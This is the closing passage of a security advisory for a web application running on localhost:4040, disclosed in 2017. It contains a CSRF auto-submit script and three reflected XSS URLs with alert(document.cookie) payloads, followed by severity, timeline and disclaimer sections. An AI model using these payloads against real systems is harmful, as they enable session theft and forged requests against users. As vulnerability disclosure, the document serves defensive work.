 <script>document.forms[0].submit()</script>
 </form>
 Then visit http://localhost:4040/index.view
 HTTP Response:
 XSS JSESSIONID=1n631ex230ljs; player-61646d696e=1; DWRSESSIONID=!hqFsK!BCyup7gBQU8spRLvw0tBacefl9Nl
 Misc Reflected:
 XSS 1
 http://localhost:4040/avatar.view?id=%3Cscript%3Ealert(document.cookie)%3C/script%3E
 XSS 2
 http://localhost:4040//userChart.view?type=%3Cscript%3Ealert(document.cookie)%3C/script%3E
 XSS 3
 http://localhost:4040/coverArt.view?size=%3Cscript%3Ealert(123)%3C/script%3E
 Network Access:
 ===============
 Remote
 Severity:
 =========
 High
 Disclosure Timeline:
 ==================================
 Vendor Notification:  May 29, 2017
 Vendor Acknowledgement: May 30, 2017
 June 4, 2017  : Public Disclosure
 [+] Disclaimer
 The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
 Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
 that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
 is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
 for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
 or exploits by the author or elsewhere. All content (c).
 hyp3rlinx